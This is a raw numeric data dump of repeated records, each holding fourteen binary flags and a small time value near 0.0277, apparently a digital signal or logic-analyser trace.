0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706820e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7706844e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706868e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7706892e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706916e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7706940e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706968e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7706996e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707020e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707044e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707068e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707092e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707116e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707140e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707168e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707196e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707220e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707244e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707268e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707292e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707316e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707344e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707368e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707392e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707420e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707444e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707468e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707492e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707516e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707540e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707568e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707596e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707620e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707644e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707668e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707692e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707716e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707744e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707768e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707796e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707820e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707844e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707868e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707896e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707920e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7707948e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7707972e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,1,2.7832572e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.7832780e-02 1,1,0,0,0,0,0,0,0,0,0,1,0,1,2.7832808e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.7832836e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.7833116e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.7833140e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.7833160e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.7833188e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.7833208e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.7833236e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.7833260e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.7833284e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.7833332e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.7833356e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,1,2.7833364e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,1,2.7833384e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7833404e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7833408e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7833416e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7833436e-02 1,1,0,0,0,0,0,0,0,1,0,0,0,0,2.7833460e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7833464e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7833508e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7833532e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7833540e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7833556e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7833584e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7833608e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7833636e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7833660e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7833684e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7833708e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7833732e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7833756e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7833784e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7833808e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7833836e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7833884e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7833908e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7833916e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7833932e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7833956e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7833984e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834008e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834036e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834060e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834084e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834108e-02 1,1,0,0,0,0,0,0,0,1,0,0,0,0,2.7834112e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7834116e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7834132e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7834156e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834164e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834184e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834208e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834236e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834260e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834284e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834308e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834332e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834356e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834384e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834408e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834460e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834484e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7834488e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7834508e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7834532e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834540e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834556e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834584e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834608e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834636e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834660e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834684e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834708e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834732e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834756e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834784e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834808e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834836e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834860e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834884e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834908e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834932e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7834956e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7834984e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7834988e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7835036e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7835060e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835068e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835084e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835108e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835132e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835156e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835184e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835208e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7835212e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7835260e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7835284e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835292e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835308e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835332e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835356e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835384e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835408e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835436e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835484e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835508e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7835516e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7835532e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7835556e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7835612e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7835636e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,2.7835640e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835644e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835660e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835684e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835708e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835732e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835756e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835784e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835808e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835836e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835860e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835884e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835908e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835932e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7835956e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7835984e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836008e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836036e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836060e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836084e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836108e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836132e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836156e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836184e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836208e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836236e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836260e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836284e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836308e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836332e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836356e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836384e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836408e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7836436e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7836484e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7836508e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836516e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836532e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836556e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836584e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836608e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836636e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836660e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836684e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836708e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836732e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836756e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836784e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836808e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836836e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836860e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836884e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836908e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7836932e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7836956e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7836964e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7837012e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7837036e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,2.7837040e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837044e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837060e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837084e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837108e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837132e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837156e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837184e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837208e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837228e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837256e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837280e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837308e-02 1,1,0,0,0,0,0,0,0,1,0,0,0,0,2.7837332e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7837336e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7837380e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7837404e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837412e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837428e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837456e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837480e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837508e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837532e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837556e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837580e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837604e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837628e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837656e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837680e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837708e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837732e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837756e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837780e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837804e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837828e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837856e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7837880e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7837908e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7837956e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7837980e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7837988e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838004e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838028e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838056e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838080e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838108e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838132e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838156e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838180e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838204e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838228e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838256e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838280e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838308e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838332e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838356e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838380e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838404e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838428e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838456e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838480e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838532e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838556e-02 1,1,0,0,0,0,0,0,0,1,0,0,0,0,2.7838560e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7838564e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7838580e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7838604e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838612e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838628e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838656e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838680e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838708e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838732e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838756e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838780e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838804e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838828e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838856e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838884e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838908e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838932e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7838956e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7838984e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839008e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839036e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839060e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839084e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839108e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839132e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839156e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839184e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839208e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839236e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839260e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839284e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839308e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839332e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839356e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839384e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839408e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839436e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839460e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839484e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839508e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839532e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839556e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839584e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839608e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839636e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839660e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839684e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839708e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839736e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839764e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7839788e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7839812e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.7964476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7964680e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7964684e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7964700e-02 0,0,1,0,0,0,0,0,0,0,0,1,0,1,2.7964732e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7964756e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,2.7965044e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7965072e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,2.7965096e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7965124e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,2.7965148e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7965172e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,2.7965220e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7965244e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,1,2.7965252e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,1,2.7965272e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,1,2.7965296e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7965304e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7965308e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7965324e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7965348e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7965372e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7965396e-02 0,0,1,0,0,0,0,0,0,1,0,0,0,0,2.7965400e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7965404e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7965444e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7965472e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,2.7965476e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7965480e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7965496e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7965524e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7965572e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7965596e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7965644e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7965672e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7965724e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7965748e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7965772e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7965796e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7965820e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7965844e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7965852e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7965896e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7965924e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,2.7965928e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7965932e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7965948e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7965972e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7965996e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966020e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966044e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966072e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966096e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966124e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966148e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966172e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966196e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966220e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966244e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966272e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966296e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966324e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966348e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966372e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966420e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966444e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7966452e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7966472e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7966496e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966504e-02 